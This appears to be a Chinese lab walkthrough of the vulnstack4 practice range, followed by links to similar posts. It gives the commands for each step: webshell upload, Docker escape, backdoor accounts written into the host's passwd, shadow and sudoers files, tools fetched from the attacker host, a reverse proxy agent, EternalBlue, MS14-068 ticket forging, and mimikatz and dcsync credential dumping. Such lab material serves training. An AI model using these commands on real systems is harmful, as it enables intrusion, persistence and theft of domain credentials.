环境介绍：

服务器：192.168.183.129、192.168.10.232

win7:192.168.183.131

DC:192.168.183.130

kali:192.168.10.182

1.拿webshell

对ubuntu的IP进行端口扫描

访问ubuntu的ip:2002 或2001或2003

用AWVS对IP：2002扫描

对其进行抓包，改包，重放

上传后访问的页面

用蚁剑连接（最好用冰蝎）

2.逃溢docker

连接后打开终端执行ip addr

可以对比我们搭建的环境看到是在docker环境里

要拿到服务器权限就要跳出docker

把sda1挂到docker里

cd /tmp

mkdir test

mount /dev/sda1 test

现在test相当与宿主机的根目录了

执行cat test/etc/passwd

这个时候可以用ssh连接

也可以写入我们自己的账号密码进行连接

cat /etc/passwd

cat /etc/shadow

在蚁剑里用下面命令写入

账号：admin123 密码：QAZWSXqaz

echo 'admin123:x:1001:1001::/home/admin123:/bin/bash'>>test/etc/passwd

echo 'admin123:$1$6jyq9ouK$v4zEUImeLNV0rLMP7i4bG0:19313:0:99999:7:::'>>test/etc/shadow

用kali主机连接

ssh admin123@192.168.10.232

不能直接useradd添加用户

3.提权

因为是普通用户，所以要提权

查看用户权限：

cat test/etc/sudoers

把admin123用户提到跟root用户权限一样

echo 'admin123 ALL=(ALL:ALL) ALL'>>test/etc/sudoers

执行

sudo su root

4.内网渗透

这里用的工具fscan_mda，下载地址：

https://github.com/shadow1ng/fscan/releases/tag/1.8.1https://github.com/shadow1ng/fscan/releases/tag/1.8.1

在fscan目录下先启一个服务：

python2:python -m SimpleHTTPServer 8888

python3:python -m http.server 8888

下载kali主机上的fscan_amd64扫描工具：

wget http://192.168.10.182:8888/fscan_amd64

注：192.168.10.182是kali的ip

添加可执行权限：

chmod +x fscan_amd64

进行整段扫描：

./fscan_amd64 -h 192.168.183.1-255

192.168.183.130是域控，直接拿域控另一台主机就没用了。所以先对192.168.183.131这台主机进行攻击。

Venom下载地址：

Release Venom v1.1.0 · Dliv3/Venom · GitHubVenom - A Multi-hop Proxy for Penetration Testers. Contribute to Dliv3/Venom development by creating an account on GitHub.https://github.com/Dliv3/Venom/releases/tag/v1.1.0

在Venom目录下先启一个服务：

python -m http.server 8888

在Venom目录下开启一个监听端：

./admin_linux_x64 -lport 5555

下载客户端agent_linux_x64:

wget http://192.168.10.182:8888/agent_linux_x64

添加可执行权限：
chmod +x agent_linux_x64

让服务器回联本机：

./agent_linux_x64 -rhost 192.168.10.182 -rport 5555

这里收到代理的节点

goto 到节点:

goto 1

启动socks监听：

socks 7777

这样就在kali上使用了一个socks 7777的监听代理

现在我们就能请求内网了

然后用msf利用永恒之蓝漏洞（ms17_010）打内网主机

msfconsole

search ms17_010

use 0

set payload windows/x64/meterpreter/bind_tcp

设置代理：

set Proxies socks5:127.0.0.1:7777

自己配置好就行

成功

拿域控

shell

chcp 65001

systeminfo

cd c:\users

查看用户：

dir

很明显就是douser了

使用ms14-068:

ms14-068

<userName>:douser

<domainName>:demo.com

systeminfo里的

<domainControlerAddr>:192.168.183.130

net view

nslookup \\TESTWIN7-PC

<clearPassword>:Dotest123

load kiwi

creds_all

<domainControlerAddr>:S-1-5-21-979886063-1111900045-1414766810-1107

查看进程：

找到douser的进程的pid，从进程窃取token：

steal_token 1200

注：不窃取token,直接执行whoami /all获取的是system的sid

获取令牌：

ms14-068 -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130

导入令牌：

rev2self

shell

cd c:\users\douser\desktop

mimikatz

kerberos::ptc TGT_douser@demo.com.ccache

dir \\WIN-ENS2VR5TR3N\c$

拿域控获取hash:

mimikatz

lsadump::dcsync /user:krbtgt /domain:demo.com

靶场vulnstack4内网渗透相关推荐

红日靶场vulnstack1 内网渗透学习
目录前言: 信息收集: phpmyadmin getshell 日志写shell yxcms getshell 植入后们: 内网域环境信息收集: 基于msf 进行信息收集: 基于msf 内网信息收集 ...
Defcon China 靶场题 - 内网渗透Writeup
对内网渗透的题目挺感兴趣的,所以做了一发. 先给个拓扑图 1. wordpress http://192.168.1.2/是一个wordpress 文件上传: http://192.168.1.2/w ...
内网安全：内网渗透.（拿到内网主机最高权限 vulntarget 靶场 A）
内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...
vulnstack内网渗透环境靶场-1 大全
一．搭建vulnstack靶场环境主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...
三层网络靶场搭建MSF内网渗透
三层网络靶场搭建&MSF内网渗透在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...
内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...
网络靶场实战-记一次大型内网渗透实践【一】
本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景准备 · 场景名称某大 ...
内网渗透靶场 Vulnstack（一）
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,msf与cs都搞了一下,搞了蛮久的,学到了不少,继续努力!!! 首先对内网域进行了解一下. 域是计算机网络的一种形式,其中所有用 ...
内网渗透之Msf-Socks代理实战（CFS三层靶场渗透过程及思路）
前言作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...

靶场vulnstack4内网渗透